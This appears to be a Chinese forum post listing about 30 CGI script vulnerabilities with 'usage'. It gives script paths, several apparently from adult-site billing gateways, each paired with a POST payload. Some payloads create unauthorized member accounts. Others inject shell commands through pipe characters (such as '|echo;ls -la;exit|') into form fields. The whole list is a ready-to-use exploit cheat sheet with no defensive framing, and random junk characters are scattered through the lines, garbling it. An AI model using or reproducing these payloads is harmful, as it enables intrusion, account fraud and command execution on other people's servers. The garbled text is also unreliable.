Cgi-bin 30个漏洞＋使用方法

admin

==============================
4 H# G! X- R( q! E% F; Q
& X& N# i, j" e  ?" T/smspass.pl
username=username&password=password

( k6 n2 w1 ?6 K/index.cgi
wei=ren&gen=command

/passmaster.cgi
/ o  g# j+ F9 k: \, Q: @2 RAction=Add&Username=Username&Password=Password

7 ]2 b9 j0 E1 o7 E( o3 [0 D/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
( V$ ~( O) C( ^1 l* ^- z" g
/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

( F, J! Z1 g2 Y& G/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

& a. [& X& C! t- ?5 n/ccbill-local.asp
post_values=username:password

/count.cgi
5 x2 F, y( ^  }0 L" dpinfile=|echo;ls -la;exit|

/ I3 T% T; E- K% V6 U" @- u/recon.cgi
! B! M. ~  C  _- }& E/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
3 Y! m( F( @0 P9 }
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
$ S+ |, \) t/ }+ \4 N
3 q7 J- S) V/ O5 ^1 L- v' t5 J6 N/af.cgi
$ l- J, c* f: G; _1 m3 }_browser_out=|echo;ls -la;exit;|
0 J& ^$ N( e  X& u) J
/modify.cgi
9 x- n/ x$ S) x8 V( e; v/ i/ lusername=username&password=password&expire=30

8 Q0 U& C% ?7 |/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|
( t! D8 o: T7 y( U2 I, D. j
/gx9passwd.cgi
- }; @3 B" y# K( ?1 m( u! Ecmd=ADD&user=username&pass=password

" s" n& ~3 B( y# B/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
* N$ j' R& X# U2 a$ F* Y. S; bsearchoption=3&searchfor=echo;ls -la;exit

" n5 z3 G: |) ^* B2 `0 b8 a, T/htadd.pl
" O! v7 ?2 z! _, t/ y4 vconfigfile=|echo; ls -alt; exit
) [7 s1 }1 v  \8 @$ Q# {
/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
" c( k. A, q7 w/ A. r% \, i
" F) S" ]8 N6 Q( A2 m( b3 c/cpay.cgi
; a5 f# a- v( t( W. [' y: bcommand=add_member&username=username(EMAIL)&password=password(DES)
* l. q! }% h: u- s4 A5 q3 v5 e6 U) f
+ j/ F3 Z+ Q/ f/ b, m8 x/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

6 G6 I* _$ i0 L/usercontrol.cgi
& t; K7 c7 I- u  v: Q  wcommand=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

5 w2 Z; Q0 V6 J% a/ _2 u/addusr.pl
user=USER&pass=PASS&confirm=PASS

4 r9 i; I3 x& ^: |+ Q/pincount.cgi
( T5 h! ~& d% ^8 f/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
: A! ^9 m* q- R7 W' I- Kusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
. Z. k; {- d* ~. R5 W7 t
/af.cgi
) ]- V7 v) r5 t0 r2 \1 C' A/env.cgi
ADD+;echo;pwd;exit
# {6 Z- \2 |! _5 a4 A
% y4 _; y* w8 H# r- I. g/count.cgi
pinfile=|echo;pwd;exit|
; W# j8 A; x' {/ e, P; p
/recon.cgi
' V$ q- o5 _& X- h* ]5 Usearchoption=1&searchfor=|echo;ls%20-al;exit|
# y5 L: C' m6 Q& ?; T# e3 B
6 d" L6 G0 B( T  f# O# B5 U/add.cgi
; y* |  f4 Z& V' Q: {( T$ K: K# }: V6 m; Iusername=username&password=password&expire=30
3 i" I7 d- I# a+ K# I5 H
1 A5 \. o3 P) k6 c+ P( E==============================
3 s# F& i+ |) _2 H) [& r: Y, Y